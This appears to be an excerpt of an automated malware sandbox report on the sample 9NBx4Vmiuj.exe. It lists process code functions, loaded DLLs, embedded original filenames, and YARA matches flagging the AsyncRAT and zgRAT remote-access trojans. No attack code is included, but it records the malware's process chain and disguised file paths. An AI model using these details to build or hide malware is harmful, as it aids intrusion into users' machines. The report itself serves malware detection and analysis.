Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF8489D3C08	3_2_00007FF8489D3C08
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848AA1B44	3_2_00007FF848AA1B44
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B713C1	3_2_00007FF848B713C1
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B702FA	3_2_00007FF848B702FA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B703FA	3_2_00007FF848B703FA
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe	Code function: 3_2_00007FF848B768BD	3_2_00007FF848B768BD
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489C05B0	4_2_00007FF8489C05B0
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489C8542	4_2_00007FF8489C8542
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489CDACD	4_2_00007FF8489CDACD
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Code function: 4_2_00007FF8489C7396	4_2_00007FF8489C7396
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848A7169D	5_2_00007FF848A7169D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00007FF848A730E9	5_2_00007FF848A730E9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C1AE6	7_2_00007FF8489C1AE6
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C1BA9	7_2_00007FF8489C1BA9
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3CD3	7_2_00007FF8489C3CD3
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3BFA	7_2_00007FF8489C3BFA
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3C08	7_2_00007FF8489C3C08
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C76AC	7_2_00007FF8489C76AC
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3F9D	7_2_00007FF8489C3F9D
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF8489C3FD3	7_2_00007FF8489C3FD3
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Code function: 7_2_00007FF848A91B58	7_2_00007FF848A91B58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_00007FF848A730E9	10_2_00007FF848A730E9

Source: TypeId.exe.0.dr	Static PE information: No import functions for PE file found
Source: 9NBx4Vmiuj.exe	Static PE information: No import functions for PE file found

Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D191000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CE13000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342CC3B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126196926.000002341C991000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2133599279.0000023435360000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2126128459.000002341C8F0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D24F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2132514547.0000023435160000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamePjraflkwkhj.dll" vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe, 00000000.00000002.2128727924.000002342D0C8000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs 9NBx4Vmiuj.exe
Source: 9NBx4Vmiuj.exe	Binary or memory string: OriginalFilenameOzsekpshyu.exe" vs 9NBx4Vmiuj.exe

Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\9NBx4Vmiuj.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\btjxg.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\AuditRuleType\TypeId.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll

Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92b62e8.12.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.9NBx4Vmiuj.exe.23435160000.14.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 3.2.RegSvcs.exe.1e3c92db520.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 3.2.RegSvcs.exe.1e3c92db520.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
